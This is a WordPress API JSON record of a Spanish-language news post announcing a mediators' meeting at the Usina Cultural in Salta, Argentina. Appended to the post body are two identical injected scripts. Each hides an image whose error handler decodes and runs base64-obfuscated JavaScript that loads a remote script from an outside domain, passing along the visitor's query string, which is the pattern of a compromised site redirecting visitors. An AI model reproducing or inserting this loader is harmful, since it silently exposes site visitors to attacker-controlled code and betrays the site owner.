{"id":1383,"date":"2022-08-29T10:45:15","date_gmt":"2022-08-29T13:45:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1383"},"modified":"2025-08-14T00:37:11","modified_gmt":"2025-08-14T03:37:11","slug":"encuentro-de-jovenes-mediadores-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1383","title":{"rendered":"Encuentro de J\u00f3venes Mediadores en la Usina Cultural"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#5b4404\"><em>Este lunes a partir de las 18 en el SUM de la Usina, profesionales abordar\u00e1n diversas tem\u00e1ticas de inter\u00e9s para el sector. El rol del mediador y la importancia del convenio son algunos de los aspectos destacados del encuentro.<\/em><\/h3>\n\n\n\n<p>Este lunes 29, a las 18.00 en el SUM &nbsp;de la Usina Cultural se llevar\u00e1 a cabo el \u201cEncuentro de J\u00f3venes Mediadores\u201d.<\/p>\n\n\n\n<p>La organizaci\u00f3n est\u00e1 a cargo de la Fundaci\u00f3n Instituto para el Desarrollo Social (REPROC N\u00b0.6), disertar\u00e1n los mediadores Eda Alias D Abate, Eudora Ignes, Jose Luis Garcia, Natalia Gutierrez Conde y Federico Nu\u00f1ez Burgos.<\/p>\n\n\n\n<p>Los disertantes, pertenecientes al Grupo de \u201cMediadores Creativos \u201c, se caracterizan por el abordaje integral e interdisciplinario de la mediaci\u00f3n, este grupo de mediadores re\u00fane el esp\u00edritu de la Ley de Mediaci\u00f3n de Salta.<\/p>\n\n\n\n<p>El temario a desarrollar comprende los siguientes ejes de trabajo: El rol del mediador; las partes y los abogados en el proceso de mediaci\u00f3n; C\u00f3mo conducir un proceso de mediaci\u00f3n; El arte de preguntar y el silencio, y la importancia del convenio<\/p>\n\n\n\n<p>El objetivo primordial en esta jornada es el intercambio de experiencias entre mediadores que inician su pr\u00e1ctica profesional y los disertantes.<\/p>\n\n\n\n<p>Entradas consultar al 3874620955 o&nbsp;<a href=\"http:\/\/idesoar@yahoo.com.ar%20\/\">http:\/\/idesoar@yahoo.com.ar&nbsp;<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/encuentro-de-jovenes-mediadores-en-la-usina-cultural-84552\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este lunes a partir de las 18 en el SUM de la Usina, profesionales abordar\u00e1n diversas tem\u00e1ticas de inter\u00e9s para el sector. El rol del mediador y la importancia del convenio son algunos de los aspectos destacados del encuentro. Este lunes 29, a las 18.00 en el SUM &nbsp;de la Usina Cultural se llevar\u00e1 a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1384,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-1383","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1383"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1383"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1383\/revisions"}],"predecessor-version":[{"id":7375,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1383\/revisions\/7375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1384"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}